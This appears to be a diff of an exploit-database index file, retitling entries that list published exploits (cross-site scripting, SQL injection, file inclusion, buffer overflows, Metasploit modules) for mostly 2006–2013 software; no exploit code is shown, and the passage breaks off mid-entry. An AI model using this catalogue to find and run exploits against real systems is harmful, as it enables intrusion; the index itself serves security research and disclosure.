27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 Showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx Login.php Cross-Site Scripting",2006-04-19,botan,php,webapps,0 @@ -24788,7 +24788,7 @@ id,file,description,date,author,platform,type,port 27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injection",2006-04-19,r0t,php,webapps,0 27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWstats.PL Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 -27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 sendim.cgi Multiple Parameter XSS",2006-04-20,r0t,cgi,webapps,0 +27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - sendim.cgi Multiple Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 imessage.cgi username Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi password Parameter XSS",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 @@ -24803,7 +24803,7 @@ id,file,description,date,author,platform,type,port 27700,platforms/windows/dos/27700.py,"VLC Player 2.0.8 - (.m3u) Local Crash PoC",2013-08-19,Asesino04,windows,dos,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0 -27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 +27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 - Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -24832,8 +24832,8 @@ id,file,description,date,author,platform,type,port 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos,0 27731,platforms/php/webapps/27731.txt,"photokorn 1.53/1.54 - index.php Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27733,platforms/php/webapps/27733.txt,"photokorn 1.53/1.54 print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27733,platforms/php/webapps/27733.txt,"photokorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - Index.php CK Parameter SQL Injection",2006-05-25,IceShaman,php,webapps,0 @@ -24849,7 +24849,7 @@ id,file,description,date,author,platform,type,port 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 -27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel gate2.php - Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 +27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 27752,platforms/unix/remote/27752.rb,"Graphite Web Unsafe Pickle Handling",2013-08-21,Metasploit,unix,remote,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 @@ -24886,7 +24886,7 @@ id,file,description,date,author,platform,type,port 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 -27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.php - Remote File Inclusion",2006-05-01,beford,php,webapps,0 +27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion",2006-05-01,beford,php,webapps,0 27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injection",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 signup.php referral Parameter XSS",2006-05-01,r0t,php,webapps,0 @@ -24910,8 +24910,8 @@ id,file,description,date,author,platform,type,port 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - Index.php Multiple SQL Injection",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 -27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 dlisting.php cid Parameter XSS",2006-05-02,r0t,php,webapps,0 -27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS",2006-05-02,r0t,php,webapps,0 +27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter XSS",2006-05-02,r0t,php,webapps,0 +27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - showpic.php preloadSlideShow Parameter XSS",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 27813,platforms/asp/webapps/27813.txt,"CyberBuild - login.asp SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 @@ -24925,12 +24925,12 @@ id,file,description,date,author,platform,type,port 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"OpenEngine 1.7/1.8 Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - Index.php Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 -27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/view.asp SearchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 admin/main.asp date Parameter XSS",2006-05-08,dj_eyes2005,asp,webapps,0 +27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/view.asp SearchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter XSS",2006-05-08,dj_eyes2005,asp,webapps,0 27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script Admin.php Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 -27830,platforms/hardware/remote/27830.java,"Multiple Cisco Products WebSense Content Filtering Bypass",2006-05-08,"George D. Gal",hardware,remote,0 +27830,platforms/hardware/remote/27830.java,"Multiple Cisco Products - WebSense Content Filtering Bypass",2006-05-08,"George D. Gal",hardware,remote,0 27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 ArticleView.php article_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 DiscView.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27833,platforms/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 Discussions.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 @@ -24954,13 +24954,13 @@ id,file,description,date,author,platform,type,port 27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security HTTP Proxy Internal IP Leakage Weakness",2006-05-10,"Bernhard Mueller",multiple,remote,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 +27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 charts.php id Parameter XSS",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 Vname Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 Chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0 27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 -27863,platforms/php/webapps/27863.txt,"PHPBB 2.0.20 Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 +27863,platforms/php/webapps/27863.txt,"PHPBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - index.php rep Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 diapo.php rep Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 affich.php image Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 @@ -24980,13 +24980,13 @@ id,file,description,date,author,platform,type,port 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - Popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27882,platforms/java/dos/27882.java,"Sun Java Applet Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",java,dos,0 -27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 HTML Injection",2005-05-15,X-BOY,php,webapps,0 +27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps,0 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - Index.php Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0 27885,platforms/php/webapps/27885.txt,"PHPRemoteView PRV.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - Search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 -27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 Admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 +27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - Admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script XSS",2006-05-17,"Jaime Blasco",hardware,remote,0 @@ -24995,7 +24995,7 @@ id,file,description,date,author,platform,type,port 27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.CGI SQL Injection",2006-05-18,l0om,cgi,webapps,0 27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 default.asp action Parameter XSS",2006-05-18,TeufeL,asp,webapps,0 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 profile.asp get Parameter XSS",2006-05-18,TeufeL,asp,webapps,0 -27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 Default.ASP SQL Injection",2006-05-19,omnipresent,asp,webapps,0 +27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - Default.ASP SQL Injection",2006-05-19,omnipresent,asp,webapps,0 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 @@ -25029,9 +25029,9 @@ id,file,description,date,author,platform,type,port 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0 -27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 +27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 -27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 +27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - Content.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 publication_index.php tf_lang Parameter XSS",2006-06-07,r0t,php,webapps,0 27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 group_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 @@ -25039,7 +25039,7 @@ id,file,description,date,author,platform,type,port 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 - Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 -27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0 +27940,platforms/windows/remote/27940.rb,"Firefox - XMLSerializer Use-After-Free",2013-08-29,Metasploit,windows,remote,0 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 @@ -25067,8 +25067,8 @@ id,file,description,date,author,platform,type,port 27965,platforms/osx/local/27965.py,"OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 -27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 UserName SQL Injection",2006-06-05,FarhadKey,php,webapps,0 -27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 Comments.php SQL Injection",2006-06-05,ajann,php,webapps,0 +27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - UserName SQL Injection",2006-06-05,FarhadKey,php,webapps,0 +27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - Comments.php SQL Injection",2006-06-05,ajann,php,webapps,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - Index.php Cross-Site Scripting",2006-06-06,Luny,php,webapps,0 27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.php Cross-Site Scripting",2006-06-06,o.y.6,php,webapps,0 @@ -25094,7 +25094,7 @@ id,file,description,date,author,platform,type,port 28011,platforms/php/webapps/28011.txt,"iFoto 0.20 - Index.php Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,php,webapps,0 28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 List.php Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps,0 -28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 Detail.php Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 +28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 - Detail.php Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion",2006-06-13,R@1D3N,php,webapps,0 28017,platforms/php/webapps/28017.txt,"CEScripts Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0 @@ -25113,10 +25113,10 @@ id,file,description,date,author,platform,type,port 28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 LoginProxy.CGI Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.php Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps,0 -28032,platforms/php/webapps/28032.txt,"MPCS 0.2 Comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 +28032,platforms/php/webapps/28032.txt,"MPCS 0.2 - Comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 Forum.php SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 28034,platforms/php/webapps/28034.txt,"Ji-takz Remote File Inclusion",2006-06-16,SpC-x,php,webapps,0 -28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 admin.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 +28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 - admin.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28036,platforms/php/webapps/28036.txt,"mcGuestbook 1.3 ecrire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28037,platforms/php/webapps/28037.txt,"mcGuestbook 1.3 lire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusion",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 @@ -25148,7 +25148,7 @@ id,file,description,date,author,platform,type,port 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,Metasploit,windows,remote,0 -28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 +28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 28087,platforms/windows/dos/28087.txt,"Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness",2006-06-22,"Debasis Mohanty",windows,dos,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps,0 28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 newthread.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 @@ -25169,7 +25169,7 @@ id,file,description,date,author,platform,type,port 28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 -28107,platforms/php/webapps/28107.txt,"Cpanel 10 Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 +28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - Login.php Cross-Site Scripting",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 - Index.php Cross-Site Scripting",2006-06-23,Luny,php,webapps,0 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps,0 @@ -25177,7 +25177,7 @@ id,file,description,date,author,platform,type,port 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 -28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 Admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 +28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - Admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - Admin.php Remote File Inclusion",2006-06-27,botan,php,webapps,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 @@ -25188,7 +25188,7 @@ id,file,description,date,author,platform,type,port 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - Index.php Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon (video.php value param) - SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - (video.php value param) SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Auth Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",2013-09-06,Metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - Index.php Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 @@ -25212,9 +25212,9 @@ id,file,description,date,author,platform,type,port 28149,platforms/php/webapps/28149.txt,"Plume CMS 1.0.4 - search.php _PX_config[manager_path] Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28150,platforms/php/webapps/28150.txt,"free QBoard 1.1 - index.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28151,platforms/php/webapps/28151.txt,"free QBoard 1.1 about.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28152,platforms/php/webapps/28152.txt,"free QBoard 1.1 contact.php qb_path Parameter Remote File 